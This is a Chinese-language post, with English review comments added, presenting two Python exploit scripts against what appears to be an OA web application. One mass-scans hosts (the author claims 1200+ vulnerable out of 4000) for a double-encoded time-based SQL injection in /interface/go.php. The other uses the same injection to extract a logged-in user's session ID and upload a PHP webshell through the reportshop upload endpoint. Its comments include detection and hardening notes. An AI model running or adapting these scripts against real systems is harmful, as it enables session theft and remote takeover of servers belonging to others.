python写的,fofa 4000目标检测出来1200+存在:
批量检测:
# -*- coding: utf-8 -*-
import requests,sys
import argparse
import urllib3
import ssl
import vthread
# Silences urllib3's InsecureRequestWarning; on its own this does not change
# whether certificates are verified.
urllib3.disable_warnings()
# Monkeypatches the stdlib's default HTTPS context factory with the unverified
# one, i.e. any stdlib-based HTTPS client in this process stops validating
# certificates. NOTE(review): whether the requests.get() calls below honour this
# hook is not established by this file.
ssl._create_default_https_context = ssl._create_unverified_context
# Sent with every request in this script, including the GETs below.
headers = {
"Content-Type":"application/x-www-form-urlencoded"
}
# Module-level accumulator. GetSession() declares it global but never assigns
# to it in this script, so it stays "".
session = ""
def isLogin(host):
    """Time-based probe of ``{host}/interface/go.php``.

    The ``APP_UNIT`` query parameter carries a double-URL-encoded payload that
    calls ``sleep(20)`` when ``user_online`` has zero rows. With a 10 s timeout
    a ``ReadTimeout`` is read as "no logged-in user" and yields False; any
    response that completes in time yields True.

    Caveats grounded in the code:
    - True only means "the request finished within 10 s". A patched target, an
      error page or an HTTP 4xx/5xx (requests does not raise on status codes)
      all return True as well, so True is not proof of the condition.
    - Only ``ReadTimeout`` is caught; connection, DNS and TLS failures propagate
      to the caller.
    - ``r`` is assigned but never used; ``headers`` is the module-level dict.

    Detection note: a legitimate request to this endpoint does not carry
    ``union select`` / ``sleep(`` inside ``APP_UNIT``; the parameter value, and
    the ~20 s response time it induces, are usable log/WAF signatures.
    """
    try:
        # Payload is double-encoded (``%25%2527`` → ``%27`` → ``'``), which is why
        # it looks unlike a normal query string in access logs.
        r = requests.get(url="{url}/interface/go.php?APP_UNIT=1aaaaaaaaaaaaa%25%252727+and+%25%252222%25%252727%25%252222=%25%2522221%25%252222+union+select+if((select count(UID) from user_online)=0%252csleep(20)%252c1)+%23%25%252727".format(url=host),timeout = 10,headers=headers)
        return True
    except requests.exceptions.ReadTimeout:
        return False
# Third-party decorator (``vthread``): calls are dispatched to a pool of 10
# worker threads instead of running inline.
@vthread.pool(10)
def GetSession(url):
    """Probe ``url`` with isLogin() and append it to ``純在漏洞.txt`` on True.

    Runs inside vthread's 10-thread pool, so several workers may open and append
    to the same file at once. NOTE(review): each call opens the file in append
    mode and writes one line; ordering between threads is not guaranteed and
    nothing here serialises the writes — confirm whether that matters to the
    consumer of the file.

    ``global session`` is declared but never assigned in this function.
    ``str = a.write(...)`` shadows the builtin ``str`` for the rest of the
    function body; the bound value (number of characters written) is unused.
    Any exception other than ReadTimeout raised inside isLogin() surfaces in the
    worker thread rather than in the caller.
    """
    global session
    if isLogin(url):
        print("存在用户登录......")
        with open('純在漏洞.txt',"a") as a: # set up the output file object
            str = a.write(url + "\n")
    else:
        print("没有用户登录")
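if __name__ == "__main__":
    # Path of the target list is read from stdin; one host or URL per line.
    # The original opened the file without ever closing it; ``with`` releases
    # the handle, and iterating the file object avoids reading it all at once.
    with open(input()) as target_file:
        for line in target_file:
            line = line.strip()
            # Blank lines used to be passed on as the bogus URL "http://";
            # skip them instead.
            if not line:
                continue
            # Substring test as in the original: any line already containing
            # "http" (so "https://" too) is passed through unchanged.
            if "http" not in line:
                line = "http://" + line
            GetSession(line)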
稍微改动下,getshell脚本:
# -*- coding: utf-8 -*-
import requests,sys
import argparse
import urllib3
import ssl
# Silences urllib3's InsecureRequestWarning; on its own this does not change
# whether certificates are verified.
urllib3.disable_warnings()
# Monkeypatches the stdlib's default HTTPS context factory with the unverified
# one, i.e. any stdlib-based HTTPS client in this process stops validating
# certificates. NOTE(review): whether the requests calls below honour this hook
# is not established by this file.
ssl._create_default_https_context = ssl._create_unverified_context
# Sent with every GET in this script; the POST in upload() uses its own headers.
headers = {
"Content-Type":"application/x-www-form-urlencoded"
}
# Module-level accumulator: GetSession() appends one character per recovered
# position and upload() reads it back as the PHPSESSID cookie value.
session = ""
def isLogin(host):
    """Time-based probe of ``{host}/interface/go.php`` (same as the batch script).

    The ``APP_UNIT`` query parameter carries a double-URL-encoded payload that
    calls ``sleep(20)`` when ``user_online`` has zero rows. With a 10 s timeout
    a ``ReadTimeout`` is read as "no logged-in user" and yields False; any
    response that completes in time yields True.

    Caveats grounded in the code:
    - True only means "the request finished within 10 s"; a patched target, an
      error page or an HTTP 4xx/5xx all return True as well.
    - Only ``ReadTimeout`` is caught; connection, DNS and TLS failures propagate.
    - ``r`` is assigned but never used.

    Detection note: ``union select`` / ``sleep(`` inside ``APP_UNIT`` and the
    induced ~20 s response time are usable log/WAF signatures for this probe.
    """
    try:
        # Double-encoded payload (``%25%2527`` → ``%27`` → ``'``).
        r = requests.get(url="{url}/interface/go.php?APP_UNIT=1aaaaaaaaaaaaa%25%252727+and+%25%252222%25%252727%25%252222=%25%2522221%25%252222+union+select+if((select count(UID) from user_online)=0%252csleep(20)%252c1)+%23%25%252727".format(url=host),timeout = 10,headers=headers)
        return True
    except requests.exceptions.ReadTimeout:
        return False
def GetSession(url):
    """Recover the first ``user_online.sid`` value from ``url`` one character at a time.

    For each position ``i`` in 0..26 and each candidate code ``x`` in 48..127 a
    GET is sent whose ``APP_UNIT`` payload evaluates ``ascii(mid(sid, i, 1)) = x``
    and calls ``sleep(20)`` on a match. With an 18 s timeout a match shows up as
    ``ReadTimeout``; the character is appended to the module-level ``session``
    and the inner loop moves on to the next position. Worst case this is
    27 × 80 requests per host, each match costing at least 18 s.

    Caveats grounded in the code:
    - Only ``ReadTimeout`` is handled; any other requests exception aborts the
      function part-way and leaves ``session`` partially filled.
    - A position where no candidate times out leaves no character behind, and a
      transient network stall produces a false match; nothing re-checks either.
    - ``session`` is never reset, so a second call concatenates onto the first.
    - The matched payload URL is printed, so the console output contains the
      recovered session id in clear.

    Detection note: per host this produces a burst of near-identical requests to
    ``/interface/go.php`` that differ only in two numbers inside ``APP_UNIT``,
    with a handful taking ≥18 s. That timing pattern plus ``sleep(`` in the
    parameter is what to alert on, and sessions in ``user_online`` should be
    treated as exposed once such traffic is observed.
    """
    global session
    if isLogin(url):
        print("存在用户登录......")
        for i in range(27):
            for x in range(48,128):
                sql = "{url}/interface/go.php?APP_UNIT=1aaaaaaaaaaaaa%25%252727+and+%25%252222%25%252727%25%252222=%25%2522221%25%252222+union+select+if(ascii(mid((select sid from user_online limit 0%252c1)%252c{mid}%252c1))={ascii}%252csleep(20)%252c1)+%23%25%252727".format(
                    url=url, mid=i, ascii=x)
                try:
                    r = requests.get(url = sql,timeout=18,headers=headers)
                except requests.exceptions.ReadTimeout:
                    # Timeout == sleep(20) fired == candidate matched this position.
                    print("编码:"+str(x))
                    print("sql:"+sql)
                    session += chr(x)
                    break
            print("session:"+session)
        print("--------------------------------------------------------")
        print("OK:",session)
    else:
        print("没有用户登录")
def upload(url,file):
    """POST ``file`` to the reportshop upload endpoint using the harvested session.

    Refuses to run unless the module-level ``session`` (filled by GetSession)
    has at least 20 characters. The file is sent as multipart field ``FILE1``
    with the literal filename ``'shell.php. '`` (trailing dot and space, taken
    verbatim from the script) and MIME type ``image/png`` to
    ``/general/reportshop/utils/upload.php?action=upload&filetype=xls``, with a
    ``PHPSESSID`` cookie set to ``session``. Success is inferred from the
    substring ``"true"`` anywhere in the response body, which is a loose check;
    on anything else the raw response text is printed.

    Note: the parameter ``file`` is rebound twice inside the body — first to the
    open file object via ``as file``, then to the multipart list — which makes
    the code hard to follow; it only works because the original path is not
    needed again.

    Hardening note (server side): treat the stored filename as untrusted —
    strip trailing dots/spaces before extension validation, and keep uploads
    outside any path the web server executes.
    """
    if len(session) < 20:
        print("session不完整,请重新获取....")
        return
    with open(file,"rb") as file:
        print("开始上传文件...")
        file = [('FILE1',('shell.php. ',file,'image/png'))]
        r = requests.post(url="{url}/general/reportshop/utils/upload.php?action=upload&filetype=xls".format(url=url),headers={"cookie":"PHPSESSID="+session},files=file)
        if "true" in r.text:
            print("上传成功,shell地址:8750端口 \\attachment\\reportshop\\templates\\shell.php")
        else:
            print(r.text)
if __name__ == "__main__":
    # Command-line front end: both arguments are mandatory, then the two
    # phases (session recovery, upload) run back to back.
    usage_text = 'python3 1.py -u url -f file'
    arg_parser = argparse.ArgumentParser(description=usage_text)
    arg_parser.add_argument(
        '-u', '--url', type=str, required=True,
        help='e.g. The website home page. 172.16.203.147',
    )
    arg_parser.add_argument(
        '-f', '--file', type=str, required=True,
        help='Path to ',
    )
    parsed = arg_parser.parse_args()
    # Keep the module-level names the original script bound.
    url = parsed.url
    file = parsed.file
    GetSession(url)
    upload(url, file)